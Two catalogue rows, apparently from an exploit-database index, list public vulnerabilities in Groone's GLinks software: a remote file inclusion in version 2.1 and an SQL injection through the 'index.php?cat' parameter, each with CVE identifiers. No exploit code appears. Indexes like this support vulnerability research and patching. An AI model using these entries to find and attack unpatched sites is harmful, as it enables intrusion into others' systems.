7954,exploits/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",webapps,php,,2009-02-02,,1,OSVDB-51821;CVE-2009-0463,,,,, 7878,exploits/php/webapps/7878.txt,"Groone's GLink ORGanizer - 'index.php?cat' SQL Injection",2009-01-26,nuclear,webapps,php,,2009-01-25,,1,OSVDB-51628;CVE-2009-0299,,,,,